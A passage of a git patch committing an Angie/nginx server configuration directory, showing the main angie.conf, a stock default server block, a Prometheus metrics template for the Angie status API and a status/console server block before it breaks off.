From af14d373fa501c338eae924de86a55afa798d5cd Mon Sep 17 00:00:00 2001 From: root Date: Sun, 16 Nov 2025 22:26:59 +0100 Subject: [PATCH] first commit --- ._config | Bin 0 -> 212 bytes ._nginx.conf | Bin 0 -> 312 bytes ._sites-available | Bin 0 -> 212 bytes ._sites-enabled | Bin 0 -> 212 bytes angie.conf | 75 + conf.d/default.conf | 44 + conf.d/prometheus_all.conf | 364 ++ conf.d/status.conf | 33 + config/._general.conf | Bin 0 -> 212 bytes config/._letsencrypt.conf | Bin 0 -> 212 bytes config/._php_fastcgi.conf | Bin 0 -> 212 bytes config/._security.conf | Bin 0 -> 212 bytes config/._wordpress.conf | Bin 0 -> 212 bytes config/custom_linuxiarz.conf | 17 + config/general.conf | 31 + config/header.conf | 10 + config/letsencrypt.conf | 4 + config/non-hotlink.conf | 12 + config/php_fastcgi.conf | 16 + config/php_fastcgi5_6.conf | 16 + config/php_fastcgi7_4.conf | 16 + config/php_fastcgi8_1.conf | 16 + config/php_fastcgi_webmail.conf | 23 + config/proxy.conf | 20 + config/rewrites.conf | 682 +++ config/security.conf | 19 + config/security_paste.conf | 19 + config/security_roundcube.conf | 18 + config/security_wp.conf | 12 + config/ssl_cfg.conf | 7 + config/wildcard.conf | 12 + config/wordpress.conf | 27 + fastcgi.conf | 27 + fastcgi_params | 25 + koi-utf | 109 + koi-win | 103 + mime.types | 99 + modules | 1 + nginx.conf | 54 + nginx.conf.dpkg-dist | 32 + off | 3859 +++++++++++++++++ prometheus_all.conf.dpkg-dist | 369 ++ proxy_params | 4 + scgi_params | 17 + sites-available/._linuxiarz.pl.conf | Bin 0 -> 212 bytes sites-available/adphone.pl.conf | 75 + sites-available/autodiscover.conf | 46 + sites-available/blog.linuxiarz.pl.conf | 82 + sites-available/default | 91 + sites-available/default.conf | 19 + sites-available/doh.conf | 66 + sites-available/gitea.linuxiarz.pl.conf | 32 + sites-available/gruszczynski.cc.conf | 97 + sites-available/gruszczynski.eu.org.conf | 80 + .../gruszczynski.eu.org_varnish.conf | 110 + sites-available/img.gruszczynski.eu.org.conf | 63 + sites-available/kodi.linuxiarz.pl.conf | 54 + sites-available/kompilacje.linuxiarz.pl.conf | 54 + sites-available/kutagroup.pl.conf | 133 + sites-available/linuxiarz.pl.conf | 82 + sites-available/linuxiarz.pl_new.conf | 156 + sites-available/listapp.linuxiarz.pl.conf | 60 + sites-available/nginx.linuxiarz.pl.conf | 54 + sites-available/pa.linuxiarz.pl.conf | 55 + sites-available/paste.linuxiarz.pl.conf | 52 + .../paste.linuxiarz.pl_varnish.conf | 72 + sites-available/pliki.linuxiarz.pl.conf | 54 + sites-available/pma.linuxiarz.pl.conf | 56 + sites-available/quarantine.linuxiarz.pl.conf | 44 + sites-available/r.linuxiarz.pl.conf | 66 + sites-available/redirects.conf | 17 + sites-available/repo.linuxiarz.pl.conf | 64 + sites-available/rspamd.linuxiarz.pl.conf | 49 + sites-available/sk.linuxiarz.pl.conf | 49 + sites-available/sogo.linuxiarz.pl.conf | 32 + sites-available/ts3stats.linuxiarz.pl.conf | 67 + sites-available/unitraklub.pl.conf | 32 + .../webmail-beta.linuxiarz.pl.conf | 60 + sites-available/webmail.linuxiarz.pl.conf | 92 + .../webmail.linuxiarz.pl_varnish.conf | 93 + .../z.gruszczynski.eu.org_varnish.conf | 87 + sites-enabled/._linuxiarz.pl.conf | Bin 0 -> 212 bytes sites-enabled/adphone.pl.conf | 1 + sites-enabled/autodiscover.conf | 46 + sites-enabled/blog.linuxiarz.pl.conf | 1 + sites-enabled/default.conf | 19 + sites-enabled/doh.conf | 66 + sites-enabled/gitea.linuxiarz.pl.conf | 1 + sites-enabled/gruszczynski.cc.conf | 101 + .../gruszczynski.eu.org_varnish.conf | 108 + sites-enabled/img.gruszczynski.eu.org.conf | 63 + sites-enabled/kodi.linuxiarz.pl.conf | 54 + sites-enabled/kompilacje.linuxiarz.pl.conf | 54 + sites-enabled/linuxiarz.pl_new.conf | 1 + sites-enabled/listapp.linuxiarz.pl.conf | 1 + sites-enabled/nginx.linuxiarz.pl.conf | 54 + sites-enabled/pa.linuxiarz.pl.conf | 55 + sites-enabled/paste.linuxiarz.pl_varnish.conf | 72 + sites-enabled/pliki.linuxiarz.pl.conf | 54 + sites-enabled/pma.linuxiarz.pl.conf | 55 + sites-enabled/quarantine.linuxiarz.pl.conf | 44 + sites-enabled/r.linuxiarz.pl.conf | 66 + sites-enabled/redirects.conf | 32 + sites-enabled/repo.linuxiarz.pl.conf | 64 + sites-enabled/rspamd.linuxiarz.pl.conf | 49 + sites-enabled/sk.linuxiarz.pl.conf | 49 + sites-enabled/status.conf | 1 + sites-enabled/ts3stats.linuxiarz.pl.conf | 67 + sites-enabled/unitraklub.pl.conf | 38 + sites-enabled/webmail-beta.linuxiarz.pl.conf | 60 + sites-enabled/webmail.linuxiarz.pl.conf | 96 + .../z.gruszczynski.eu.org_varnish.conf | 87 + snippets/fastcgi-php.conf | 13 + snippets/snakeoil.conf | 5 + ssl/angie.crt | 22 + ssl/angie.key | 28 + uwsgi_params | 16 + win-utf | 125 + 118 files changed, 10255 insertions(+) create mode 100755 ._config create mode 100755 ._nginx.conf create mode 100755 ._sites-available create mode 100755 ._sites-enabled create mode 100755 angie.conf create mode 100644 conf.d/default.conf create mode 100644 conf.d/prometheus_all.conf create mode 100644 conf.d/status.conf create mode 100755 config/._general.conf create mode 100755 config/._letsencrypt.conf create mode 100755 config/._php_fastcgi.conf create mode 100755 config/._security.conf create mode 100755 config/._wordpress.conf create mode 100644 config/custom_linuxiarz.conf create mode 100755 config/general.conf create mode 100644 config/header.conf create mode 100755 config/letsencrypt.conf create mode 100644 config/non-hotlink.conf create mode 100755 config/php_fastcgi.conf create mode 100644 config/php_fastcgi5_6.conf create mode 100755 config/php_fastcgi7_4.conf create mode 100755 config/php_fastcgi8_1.conf create mode 100755 config/php_fastcgi_webmail.conf create mode 100644 config/proxy.conf create mode 100644 config/rewrites.conf create mode 100755 config/security.conf create mode 100644 config/security_paste.conf create mode 100644 config/security_roundcube.conf create mode 100755 config/security_wp.conf create mode 100644 config/ssl_cfg.conf create mode 100644 config/wildcard.conf create mode 100755 config/wordpress.conf create mode 100644 fastcgi.conf create mode 100644 fastcgi_params create mode 100644 koi-utf create mode 100644 koi-win create mode 100644 mime.types create mode 120000 modules create mode 100755 nginx.conf create mode 100755 nginx.conf.dpkg-dist create mode 100644 off create mode 100644 prometheus_all.conf.dpkg-dist create mode 100644 proxy_params create mode 100644 scgi_params create mode 100755 sites-available/._linuxiarz.pl.conf create mode 100644 sites-available/adphone.pl.conf create mode 100644 sites-available/autodiscover.conf create mode 100644 sites-available/blog.linuxiarz.pl.conf create mode 100644 sites-available/default create mode 100644 sites-available/default.conf create mode 100644 sites-available/doh.conf create mode 100644 sites-available/gitea.linuxiarz.pl.conf create mode 100644 sites-available/gruszczynski.cc.conf create mode 100644 sites-available/gruszczynski.eu.org.conf create mode 100644 sites-available/gruszczynski.eu.org_varnish.conf create mode 100644 sites-available/img.gruszczynski.eu.org.conf create mode 100644 sites-available/kodi.linuxiarz.pl.conf create mode 100644 sites-available/kompilacje.linuxiarz.pl.conf create mode 100644 sites-available/kutagroup.pl.conf create mode 100755 sites-available/linuxiarz.pl.conf create mode 100644 sites-available/linuxiarz.pl_new.conf create mode 100644 sites-available/listapp.linuxiarz.pl.conf create mode 100644 sites-available/nginx.linuxiarz.pl.conf create mode 100644 sites-available/pa.linuxiarz.pl.conf create mode 100644 sites-available/paste.linuxiarz.pl.conf create mode 100644 sites-available/paste.linuxiarz.pl_varnish.conf create mode 100644 sites-available/pliki.linuxiarz.pl.conf create mode 100644 sites-available/pma.linuxiarz.pl.conf create mode 100644 sites-available/quarantine.linuxiarz.pl.conf create mode 100644 sites-available/r.linuxiarz.pl.conf create mode 100644 sites-available/redirects.conf create mode 100644 sites-available/repo.linuxiarz.pl.conf create mode 100644 sites-available/rspamd.linuxiarz.pl.conf create mode 100644 sites-available/sk.linuxiarz.pl.conf create mode 100644 sites-available/sogo.linuxiarz.pl.conf create mode 100644 sites-available/ts3stats.linuxiarz.pl.conf create mode 100644 sites-available/unitraklub.pl.conf create mode 100644 sites-available/webmail-beta.linuxiarz.pl.conf create mode 100644 sites-available/webmail.linuxiarz.pl.conf create mode 100644 sites-available/webmail.linuxiarz.pl_varnish.conf create mode 100644 sites-available/z.gruszczynski.eu.org_varnish.conf create mode 100755 sites-enabled/._linuxiarz.pl.conf create mode 120000 sites-enabled/adphone.pl.conf create mode 100644 sites-enabled/autodiscover.conf create mode 120000 sites-enabled/blog.linuxiarz.pl.conf create mode 100644 sites-enabled/default.conf create mode 100644 sites-enabled/doh.conf create mode 120000 sites-enabled/gitea.linuxiarz.pl.conf create mode 100644 sites-enabled/gruszczynski.cc.conf create mode 100644 sites-enabled/gruszczynski.eu.org_varnish.conf create mode 100644 sites-enabled/img.gruszczynski.eu.org.conf create mode 100644 sites-enabled/kodi.linuxiarz.pl.conf create mode 100644 sites-enabled/kompilacje.linuxiarz.pl.conf create mode 120000 sites-enabled/linuxiarz.pl_new.conf create mode 120000 sites-enabled/listapp.linuxiarz.pl.conf create mode 100644 sites-enabled/nginx.linuxiarz.pl.conf create mode 100644 sites-enabled/pa.linuxiarz.pl.conf create mode 100644 sites-enabled/paste.linuxiarz.pl_varnish.conf create mode 100644 sites-enabled/pliki.linuxiarz.pl.conf create mode 100644 sites-enabled/pma.linuxiarz.pl.conf create mode 100644 sites-enabled/quarantine.linuxiarz.pl.conf create mode 100644 sites-enabled/r.linuxiarz.pl.conf create mode 100644 sites-enabled/redirects.conf create mode 100644 sites-enabled/repo.linuxiarz.pl.conf create mode 100644 sites-enabled/rspamd.linuxiarz.pl.conf create mode 100644 sites-enabled/sk.linuxiarz.pl.conf create mode 120000 sites-enabled/status.conf create mode 100644 sites-enabled/ts3stats.linuxiarz.pl.conf create mode 100644 sites-enabled/unitraklub.pl.conf create mode 100644 sites-enabled/webmail-beta.linuxiarz.pl.conf create mode 100644 sites-enabled/webmail.linuxiarz.pl.conf create mode 100644 sites-enabled/z.gruszczynski.eu.org_varnish.conf create mode 100644 snippets/fastcgi-php.conf create mode 100644 snippets/snakeoil.conf create mode 100644 ssl/angie.crt create mode 100644 ssl/angie.key create mode 100644 uwsgi_params create mode 100644 win-utf diff --git a/._config b/._config new file mode 100755 index 0000000000000000000000000000000000000000..83aeeb234a4736221349a7975e6520602a0a4080 GIT binary patch literal 212 zcmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}@gg7w@vi_e5x_AdBnYYuq+J^qI7A5ADWagzZ6zUroSQuKHrdb+TSemC;J7*N-=cZb_8k?IN lS-QIDI=fgJ>6)0EyXrbQn!4$_S(>>S8(A2+7#bQd004uLA7lUk literal 0 HcmV?d00001 diff --git a/._nginx.conf b/._nginx.conf new file mode 100755 index 0000000000000000000000000000000000000000..28605bf92e442ecc0ff44d6ca2f3959d1fff6ecb GIT binary patch literal 312 zcmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDJkFfg(KX&|4`0!R}99795aAj-fxwgA~J zXxc!ggTy@;82FR(bM+Dn3UX5QaubttAPWBgDH{d`QG{G!X<|`gUP)$ND$ptRd!BD# z&2v9IJ8kAX<82`qA(}`f3-t{QEDWtp(<}`vEX`A_oimE^b5pHdjm^!CEL~l6on0)A cbWP07U3HxtP2F_eEX~}EjVz2@3=It!07E4$2mk;8 literal 0 HcmV?d00001 diff --git a/._sites-available b/._sites-available new file mode 100755 index 0000000000000000000000000000000000000000..83aeeb234a4736221349a7975e6520602a0a4080 GIT binary patch literal 212 zcmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}@gg7w@vi_e5x_AdBnYYuq+J^qI7A5ADWagzZ6zUroSQuKHrdb+TSemC;J7*N-=cZb_8k?IN lS-QIDI=fgJ>6)0EyXrbQn!4$_S(>>S8(A2+7#bQd004uLA7lUk literal 0 HcmV?d00001 diff --git a/._sites-enabled b/._sites-enabled new file mode 100755 index 0000000000000000000000000000000000000000..83aeeb234a4736221349a7975e6520602a0a4080 GIT binary patch literal 212 zcmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}@gg7w@vi_e5x_AdBnYYuq+J^qI7A5ADWagzZ6zUroSQuKHrdb+TSemC;J7*N-=cZb_8k?IN lS-QIDI=fgJ>6)0EyXrbQn!4$_S(>>S8(A2+7#bQd004uLA7lUk literal 0 HcmV?d00001 diff --git a/angie.conf b/angie.conf new file mode 100755 index 0000000..b35d544 --- /dev/null +++ b/angie.conf @@ -0,0 +1,75 @@ +load_module /usr/lib/angie/modules/ngx_http_headers_more_filter_module.so; +load_module /usr/lib/angie/modules/ngx_http_brotli_filter_module.so; +load_module /usr/lib/angie/modules/ngx_http_brotli_static_module.so; +load_module /usr/lib/angie/modules/ngx_http_zstd_filter_module.so; +load_module /usr/lib/angie/modules/ngx_http_zstd_static_module.so; + +user www-data; +pid /run/angie.pid; +worker_processes auto; +worker_rlimit_nofile 65535; + +events { + multi_accept on; + worker_connections 65535; +} + +http { + + log_format main '$remote_addr $remote_port - $remote_user [$time_local] "$request" ' + '$status $body_bytes_sent "$http_referer" ' + '"$http_user_agent" "$http_x_forwarded_for" "$http_cookie" "$sent_http_set_cookie" "$http_host" "$http3"'; + + + #charset utf-8; + sendfile on; + tcp_nopush on; + tcp_nodelay on; + server_tokens off; + log_not_found off; + types_hash_max_size 2048; + client_max_body_size 512M; + client_body_buffer_size 512M; + etag off; + + # MIME + include mime.types; + default_type application/octet-stream; + + # Logging + access_log /var/log/angie/access.log; + error_log /var/log/angie/error.log warn; + + # SSL + ssl_session_timeout 1d; + ssl_session_cache shared:SSL:10m; + ssl_session_tickets off; + + # Mozilla Modern configuration + ssl_protocols TLSv1.3 TLSv1.2; + + # OCSP Stapling + ssl_stapling on; + ssl_stapling_verify on; + resolver 1.1.1.1 1.0.0.1 8.8.8.8 8.8.4.4 valid=60s; + resolver_timeout 2s; + + brotli off; + brotli_comp_level 6; + brotli_static on; + brotli_types *; + + zstd on; + zstd_min_length 256; # no less than 256 bytes + zstd_comp_level 3; # set the level to 3 + + # Load configs + include /etc/angie/conf.d/*.conf; + include /etc/angie/sites-enabled/*; + more_clear_headers "Server"; + + set_real_ip_from 127.0.0.1; # Zaufane IP (np. Varnish lub inny proxy) + real_ip_header X-Forwarded-For; # Użyj nagłówka X-Forwarded-For do określenia prawdziwego IP + real_ip_recursive on; # Uwzględnij wszystkie adresy IP w X-Forwarded-For + +} diff --git a/conf.d/default.conf b/conf.d/default.conf new file mode 100644 index 0000000..ff2ced6 --- /dev/null +++ b/conf.d/default.conf @@ -0,0 +1,44 @@ +server { + listen 80; + server_name localhost; + + #access_log /var/log/nginx/host.access.log main; + + location / { + root /usr/share/nginx/html; + index index.html index.htm; + } + + #error_page 404 /404.html; + + # redirect server error pages to the static page /50x.html + # + error_page 500 502 503 504 /50x.html; + location = /50x.html { + root /usr/share/nginx/html; + } + + # proxy the PHP scripts to Apache listening on 127.0.0.1:80 + # + #location ~ \.php$ { + # proxy_pass http://127.0.0.1; + #} + + # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 + # + #location ~ \.php$ { + # root html; + # fastcgi_pass 127.0.0.1:9000; + # fastcgi_index index.php; + # fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; + # include fastcgi_params; + #} + + # deny access to .htaccess files, if Apache's document root + # concurs with nginx's one + # + #location ~ /\.ht { + # deny all; + #} +} + diff --git a/conf.d/prometheus_all.conf b/conf.d/prometheus_all.conf new file mode 100644 index 0000000..57fb1b8 --- /dev/null +++ b/conf.d/prometheus_all.conf @@ -0,0 +1,364 @@ +prometheus_template all { + +angie_connections_accepted $p8s_value + path=/connections/accepted + type=counter + 'help=The total number of accepted client connections.'; + +angie_connections_dropped $p8s_value + path=/connections/dropped + type=counter + 'help=The total number of dropped client connections.'; + +angie_connections_active $p8s_value + path=/connections/active + type=gauge + 'help=The current number of active client connections.'; + +angie_connections_idle $p8s_value + path=/connections/idle + type=gauge + 'help=The current number of idle client connections.'; + + +'angie_slabs_pages_used{zone="$1"}' $p8s_value + path=~^/slabs/([^/]+)/pages/used$ + type=gauge + 'help=The number of currently used memory pages in a slab zone.'; + +'angie_slabs_pages_free{zone="$1"}' $p8s_value + path=~^/slabs/([^/]+)/pages/free$ + type=gauge + 'help=The number of currently free memory pages in a slab zone.'; + + +'angie_slabs_pages_slots_used{zone="$1",size="$2"}' $p8s_value + path=~^/slabs/([^/]+)/slots/([^/]+)/used$ + type=gauge + 'help=The number of currently used memory slots of a specific size in a slab zone.'; + +'angie_slabs_pages_slots_free{zone="$1",size="$2"}' $p8s_value + path=~^/slabs/([^/]+)/slots/([^/]+)/free$ + type=gauge + 'help=The number of currently free memory slots of a specific size in a slab zone.'; + +'angie_slabs_pages_slots_reqs{zone="$1",size="$2"}' $p8s_value + path=~^/slabs/([^/]+)/slots/([^/]+)/reqs$ + type=counter + 'help=The total number of attempts to allocate a memory slot of a specific size in a slab zone.'; + +'angie_slabs_pages_slots_fails{zone="$1",size="$2"}' $p8s_value + path=~^/slabs/([^/]+)/slots/([^/]+)/fails$ + type=counter + 'help=The number of unsuccessful attempts to allocate a memory slot of a specific size in a slab zone.'; + + +'angie_resolvers_queries{zone="$1",type="$2"}' $p8s_value + path=~^/resolvers/([^/]+)/queries/([^/]+)$ + type=counter + 'help=The number of queries of a specific type to resolve in a resolver zone.'; + +'angie_resolvers_sent{zone="$1",type="$2"}' $p8s_value + path=~^/resolvers/([^/]+)/sent/([^/]+)$ + type=counter + 'help=The number of sent DNS queries of a specific type to resolve in a resolver zone.'; + +'angie_resolvers_responses{zone="$1",status="$2"}' $p8s_value + path=~^/resolvers/([^/]+)/responses/([^/]+)$ + type=counter + 'help=The number of resolution results with a specific status in a resolver zone.'; + + +'angie_http_server_zones_ssl_handshaked{zone="$1"}' $p8s_value + path=~^/http/server_zones/([^/]+)/ssl/handshaked$ + type=counter + 'help=The total number of successful SSL handshakes in an HTTP server zone.'; + +'angie_http_server_zones_ssl_reuses{zone="$1"}' $p8s_value + path=~^/http/server_zones/([^/]+)/ssl/reuses$ + type=counter + 'help=The total number of session reuses during SSL handshakes in an HTTP server zone.'; + +'angie_http_server_zones_ssl_timedout{zone="$1"}' $p8s_value + path=~^/http/server_zones/([^/]+)/ssl/timedout$ + type=counter + 'help=The total number of timed-out SSL handshakes in an HTTP server zone.'; + +'angie_http_server_zones_ssl_failed{zone="$1"}' $p8s_value + path=~^/http/server_zones/([^/]+)/ssl/failed$ + type=counter + 'help=The total number of failed SSL handshakes in an HTTP server zone.'; + + +'angie_http_server_zones_requests_total{zone="$1"}' $p8s_value + path=~^/http/server_zones/([^/]+)/requests/total$ + type=counter + 'help=The total number of client requests received in an HTTP server zone.'; + +'angie_http_server_zones_requests_processing{zone="$1"}' $p8s_value + path=~^/http/server_zones/([^/]+)/requests/processing$ + type=gauge + 'help=The number of client requests currently being processed in an HTTP server zone.'; + +'angie_http_server_zones_requests_discarded{zone="$1"}' $p8s_value + path=~^/http/server_zones/([^/]+)/requests/discarded$ + type=counter + 'help=The total number of client requests completed in an HTTP server zone without sending a response.'; + + +'angie_http_server_zones_responses{zone="$1",code="$2"}' $p8s_value + path=~^/http/server_zones/([^/]+)/responses/([^/]+)$ + type=counter + 'help=The number of responses with a specific status in an HTTP server zone.'; + + +'angie_http_server_zones_data_received{zone="$1"}' $p8s_value + path=~^/http/server_zones/([^/]+)/data/received$ + type=counter + 'help=The total number of bytes received from clients in an HTTP server zone.'; + +'angie_http_server_zones_data_sent{zone="$1"}' $p8s_value + path=~^/http/server_zones/([^/]+)/data/sent$ + type=counter + 'help=The total number of bytes sent to clients in an HTTP server zone.'; + + +'angie_http_location_zones_requests_total{zone="$1"}' $p8s_value + path=~^/http/location_zones/([^/]+)/requests/total$ + type=counter + 'help=The total number of client requests in an HTTP location zone.'; + +'angie_http_location_zones_requests_discarded{zone="$1"}' $p8s_value + path=~^/http/location_zones/([^/]+)/requests/discarded$ + type=counter + 'help=The total number of client requests completed in an HTTP location zone without sending a response.'; + + +'angie_http_location_zones_responses{zone="$1",code="$2"}' $p8s_value + path=~^/http/location_zones/([^/]+)/responses/([^/]+)$ + type=counter + 'help=The number of responses with a specific status in an HTTP location zone.'; + + +'angie_http_location_zones_data_received{zone="$1"}' $p8s_value + path=~^/http/location_zones/([^/]+)/data/received$ + type=counter + 'help=The total number of bytes received from clients in an HTTP location zone.'; + +'angie_http_location_zones_data_sent{zone="$1"}' $p8s_value + path=~^/http/location_zones/([^/]+)/data/sent$ + type=counter + 'help=The total number of bytes sent to clients in an HTTP location zone.'; + + +'angie_http_upstreams_peers_state{upstream="$1",peer="$2"}' $p8st_all_ups_state + path=~^/http/upstreams/([^/]+)/peers/([^/]+)/state$ + type=gauge + 'help=The current state of an upstream peer in "HTTP": 1 - up, 2 - down, 3 - unavailable, or 4 - recovering.'; + + +'angie_http_upstreams_peers_selected_current{upstream="$1",peer="$2"}' $p8s_value + path=~^/http/upstreams/([^/]+)/peers/([^/]+)/selected/current$ + type=gauge + 'help=The number of requests currently being processed by an upstream peer in "HTTP".'; + +'angie_http_upstreams_peers_selected_total{upstream="$1",peer="$2"}' $p8s_value + path=~^/http/upstreams/([^/]+)/peers/([^/]+)/selected/total$ + type=counter + 'help=The total number of attempts to use an upstream peer in "HTTP".'; + + +'angie_http_upstreams_peers_responses{upstream="$1",peer="$2",code="$3"}' $p8s_value + path=~^/http/upstreams/([^/]+)/peers/([^/]+)/responses/([^/]+)$ + type=counter + 'help=The number of responses with a specific status received from an upstream peer in "HTTP".'; + + +'angie_http_upstreams_peers_data_sent{upstream="$1",peer="$2"}' $p8s_value + path=~^/http/upstreams/([^/]+)/peers/([^/]+)/data/sent$ + type=counter + 'help=The total number of bytes sent to an upstream peer in "HTTP".'; + +'angie_http_upstreams_peers_data_received{upstream="$1",peer="$2"}' $p8s_value + path=~^/http/upstreams/([^/]+)/peers/([^/]+)/data/received$ + type=counter + 'help=The total number of bytes received from an upstream peer in "HTTP".'; + + +'angie_http_upstreams_peers_health_fails{upstream="$1",peer="$2"}' $p8s_value + path=~^/http/upstreams/([^/]+)/peers/([^/]+)/health/fails$ + type=counter + 'help=The total number of unsuccessful attempts to communicate with an upstream peer in "HTTP".'; + +'angie_http_upstreams_peers_health_unavailable{upstream="$1",peer="$2"}' $p8s_value + path=~^/http/upstreams/([^/]+)/peers/([^/]+)/health/unavailable$ + type=counter + 'help=The number of times when an upstream peer in "HTTP" became "unavailable" due to reaching the max_fails limit.'; + +'angie_http_upstreams_peers_health_downtime{upstream="$1",peer="$2"}' $p8s_value + path=~^/http/upstreams/([^/]+)/peers/([^/]+)/health/downtime$ + type=counter + 'help=The total time (in milliseconds) that an upstream peer in "HTTP" was "unavailable".'; + + +'angie_http_upstreams_keepalive{upstream="$1"}' $p8s_value + path=~^/http/upstreams/([^/]+)/keepalive$ + type=gauge + 'help=The number of currently cached keepalive connections for an HTTP upstream.'; + + +'angie_http_caches_responses{zone="$1",status="$2"}' $p8s_value + path=~^/http/caches/([^/]+)/([^/]+)/responses$ + type=counter + 'help=The total number of responses processed in an HTTP cache zone with a specific cache status.'; + +'angie_http_caches_bytes{zone="$1",status="$2"}' $p8s_value + path=~^/http/caches/([^/]+)/([^/]+)/bytes$ + type=counter + 'help=The total number of bytes processed in an HTTP cache zone with a specific cache status.'; + +'angie_http_caches_responses_written{zone="$1",status="$2"}' $p8s_value + path=~^/http/caches/([^/]+)/([^/]+)/responses_written$ + type=counter + 'help=The total number of responses written to an HTTP cache zone with a specific cache status.'; + +'angie_http_caches_bytes_written{zone="$1",status="$2"}' $p8s_value + path=~^/http/caches/([^/]+)/([^/]+)/bytes_written$ + type=counter + 'help=The total number of bytes written to an HTTP cache zone with a specific cache status.'; + + +'angie_http_caches_size{zone="$1"}' $p8s_value + path=~^/http/caches/([^/]+)/size$ + type=gauge + 'help=The current size (in bytes) of cached responses in an HTTP cache zone.'; + + +'angie_http_caches_shards_size{zone="$1",path="$2"}' $p8s_value + path=~^/http/caches/([^/]+)/shards/([^/]+)/size$ + type=gauge + 'help=The current size (in bytes) of cached responses in a shard path of an HTTP cache zone.'; + + +'angie_http_limit_conns{zone="$1",status="$2"}' $p8s_value + path=~^/http/limit_conns/([^/]+)/([^/]+)$ + type=counter + 'help=The number of requests processed by an HTTP limit_conn zone with a specific result.'; + +'angie_http_limit_reqs{zone="$1",status="$2"}' $p8s_value + path=~^/http/limit_reqs/([^/]+)/([^/]+)$ + type=counter + 'help=The number of requests processed by an HTTP limit_reqs zone with a specific result.'; + + +'angie_stream_server_zones_ssl_handshaked{zone="$1"}' $p8s_value + path=~^/stream/server_zones/([^/]+)/ssl/handshaked$ + type=counter + 'help=The total number of successful SSL handshakes in a stream server zone.'; + +'angie_stream_server_zones_ssl_reuses{zone="$1"}' $p8s_value + path=~^/stream/server_zones/([^/]+)/ssl/reuses$ + type=counter + 'help=The total number of session reuses during SSL handshakes in a stream server zone.'; + +'angie_stream_server_zones_ssl_timedout{zone="$1"}' $p8s_value + path=~^/stream/server_zones/([^/]+)/ssl/timedout$ + type=counter + 'help=The total number of timed-out SSL handshakes in a stream server zone.'; + +'angie_stream_server_zones_ssl_failed{zone="$1"}' $p8s_value + path=~^/stream/server_zones/([^/]+)/ssl/failed$ + type=counter + 'help=The total number of failed SSL handshakes in a stream server zone.'; + + +'angie_stream_server_zones_connections_total{zone="$1"}' $p8s_value + path=~^/stream/server_zones/([^/]+)/connections/total$ + type=counter + 'help=The total number of client connections received in a stream server zone.'; + +'angie_stream_server_zones_connections_processing{zone="$1"}' $p8s_value + path=~^/stream/server_zones/([^/]+)/connections/processing$ + type=gauge + 'help=The number of client connections currently being processed in a stream server zone.'; + +'angie_stream_server_zones_connections_discarded{zone="$1"}' $p8s_value + path=~^/stream/server_zones/([^/]+)/connections/discarded$ + type=counter + 'help=The total number of client connections completed in a stream server zone without establishing a session.'; + +'angie_stream_server_zones_connections_passed{zone="$1"}' $p8s_value + path=~^/stream/server_zones/([^/]+)/connections/passed$ + type=counter + 'help=The total number of client connections in a stream server zone passed for handling to a different listening socket.'; + + +'angie_stream_server_zones_sessions{zone="$1",status="$2"}' $p8s_value + path=~^/stream/server_zones/([^/]+)/sessions/([^/]+)$ + type=counter + 'help=The number of sessions finished with a specific status in a stream server zone.'; + + +'angie_stream_server_zones_data_received{zone="$1"}' $p8s_value + path=~^/stream/server_zones/([^/]+)/data/received$ + type=counter + 'help=The total number of bytes received from clients in a stream server zone.'; + +'angie_stream_server_zones_data_sent{zone="$1"}' $p8s_value + path=~^/stream/server_zones/([^/]+)/data/sent$ + type=counter + 'help=The total number of bytes sent to clients in a stream server zone.'; + + +'angie_stream_upstreams_peers_state{upstream="$1",peer="$2"}' $p8st_all_ups_state + path=~^/stream/upstreams/([^/]+)/peers/([^/]+)/state$ + type=gauge + 'help=The current state of an upstream peer in "stream": 1 - up, 2 - down, 3 - unavailable, or 4 - recovering.'; + + +'angie_stream_upstreams_peers_selected_current{upstream="$1",peer="$2"}' $p8s_value + path=~^/stream/upstreams/([^/]+)/peers/([^/]+)/selected/current$ + type=gauge + 'help=The number of sessions currently being processed by an upstream peer in "stream".'; + +'angie_stream_upstreams_peers_selected_total{upstream="$1",peer="$2"}' $p8s_value + path=~^/stream/upstreams/([^/]+)/peers/([^/]+)/selected/total$ + type=counter + 'help=The total number of attempts to use an upstream peer in "stream".'; + + +'angie_stream_upstreams_peers_data_sent{upstream="$1",peer="$2"}' $p8s_value + path=~^/stream/upstreams/([^/]+)/peers/([^/]+)/data/sent$ + type=counter + 'help=The total number of bytes sent to an upstream peer in "stream".'; + +'angie_stream_upstreams_peers_data_received{upstream="$1",peer="$2"}' $p8s_value + path=~^/stream/upstreams/([^/]+)/peers/([^/]+)/data/received$ + type=counter + 'help=The total number of bytes received from an upstream peer in "stream".'; + + +'angie_stream_upstreams_peers_health_fails{upstream="$1",peer="$2"}' $p8s_value + path=~^/stream/upstreams/([^/]+)/peers/([^/]+)/health/fails$ + type=counter + 'help=The total number of unsuccessful attempts to communicate with an upstream peer in "stream".'; + +'angie_stream_upstreams_peers_health_unavailable{upstream="$1",peer="$2"}' $p8s_value + path=~^/stream/upstreams/([^/]+)/peers/([^/]+)/health/unavailable$ + type=counter + 'help=The number of times when an upstream peer in "stream" became "unavailable" due to reaching the max_fails limit.'; + +'angie_stream_upstreams_peers_health_downtime{upstream="$1",peer="$2"}' $p8s_value + path=~^/stream/upstreams/([^/]+)/peers/([^/]+)/health/downtime$ + type=counter + 'help=The total time (in milliseconds) that an upstream peer in "stream" was "unavailable".'; +} + +map $p8s_value $p8st_all_ups_state { + volatile; + "up" 1; + "down" 2; + "unavailable" 3; + "recovering" 4; + default 0; +} diff --git a/conf.d/status.conf b/conf.d/status.conf new file mode 100644 index 0000000..385a7c4 --- /dev/null +++ b/conf.d/status.conf @@ -0,0 +1,33 @@ +#include conf.d/prometheus_all.conf; + +server { + listen 84; + listen 86; + + location /nginx_status { + stub_status on; + access_log off; + allow all; + } + + auto_redirect on; + + location /status/ { + api /status/; + api_config_files on; + } + + location /console/ { + alias /usr/share/angie-console-light/html/; + index index.html; + } + + location /console/api/ { + api /status/; + } + + location =/p8s { + prometheus all; + } + +} diff --git a/config/._general.conf b/config/._general.conf new file mode 100755 index 0000000000000000000000000000000000000000..83aeeb234a4736221349a7975e6520602a0a4080 GIT binary patch literal 212 